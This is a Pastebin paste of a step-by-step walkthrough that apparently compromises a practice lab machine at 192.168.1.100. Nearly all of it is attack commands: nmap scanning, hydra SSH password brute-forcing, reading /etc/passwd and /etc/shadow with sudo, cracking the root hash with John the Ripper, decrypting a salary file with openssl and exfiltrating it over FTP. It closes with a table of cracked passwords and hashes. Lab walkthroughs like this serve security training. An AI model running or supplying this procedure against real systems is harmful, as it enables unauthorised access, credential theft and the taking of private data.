SHARE
TWEET

g0tmi1k

a guest Feb 12th, 2010 617 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. nmap -n 192.168.1.1-255
  2.  
  3. nmap -n -sS -sV -O 192.168.1.100
  4.  
  5. firefox 192.168.1.100
  6.  
  7. [+]kate -> make list of possible usernames. Save. Filename: usernames
  8. // lastF, fLast
  9.  
  10. hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s
  11.  
  12. ssh bbanter@192.168.1.100
  13. // "Yes" if quiz about trusting authenticity. Password: bbanter
  14.  
  15. cd /etc/
  16.  
  17. cat passwd
  18.  
  19. [+]kate -> Update usernames. Save.
  20.  
  21. cat group
  22.  
  23. exit
  24.  
  25. cd /root/tools/dictionary/
  26.  
  27. cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
  28.  
  29. hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords
  30.  
  31. ssh aadams@192.168.1.100
  32. // Password: nostradamus
  33.  
  34. cd /etc/
  35.  
  36. sudo cat shadow
  37. // Password: nostradamus
  38.  
  39. [+]kate -> New -> Paste -> Save. Filename: shadow
  40.  
  41. exit
  42.  
  43. john
  44.  
  45. ./john --rules --wordlist=/root/passwords --users=root /root/shadow
  46. // Password: tarot
  47.  
  48. ssh aadams@192.168.1.100
  49. // Password: nostradamus
  50.  
  51. su
  52. // Password: tarot
  53.  
  54. ls -a
  55.  
  56. cd ..
  57.  
  58.  
  59.  
  60. ls -a
  61.  
  62. cd ftp
  63. /
  64.  
  65. ls -a
  66.  
  67. cd incoming/
  68.  
  69. ls -a
  70.  
  71. openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
  72.  
  73. cd /etc/
  74.  
  75. vi vsftpd.conf
  76. // edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)
  77.  
  78. modprobe capability
  79.  
  80. exit
  81.  
  82. exit
  83.  
  84. ftp 192.168.1.100
  85. // User: root. Password: tarot
  86.  
  87. ls -a
  88.  
  89.  
  90.  
  91. cd ..
  92.  
  93.  
  94. ls -a
  95.  
  96.  
  97.  
  98. cd home
  99.  
  100.  
  101.  
  102. ls -a
  103.  
  104.  
  105.  
  106. cd ftp
  107.  
  108.  
  109.  
  110. ls -a
  111.  
  112.  
  113.  
  114. cd incoming
  115.  
  116.  
  117.  
  118. ls -a
  119.  
  120.  
  121. get salary.csv
  122.  
  123.  
  124.  
  125. cd /pentest/passwords/jtr
  126.  
  127. ls
  128.  
  129.  
  130.  
  131. mv salary.csv ~
  132.  
  133. [+]kate -> salary.csv
  134.  
  135. // GAME OVER
  136.  
  137.  
  138.  
  139. ----------------------------------------------------------------------------------------------------
  140. Users
  141. root:tarot           = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
  142. aadams:nostradamus   = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
  143. bbanter:bbanter      = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
  144. ccoffee:hierophant   = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
  145. ----------------------------------------------------------------------------------------------------
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top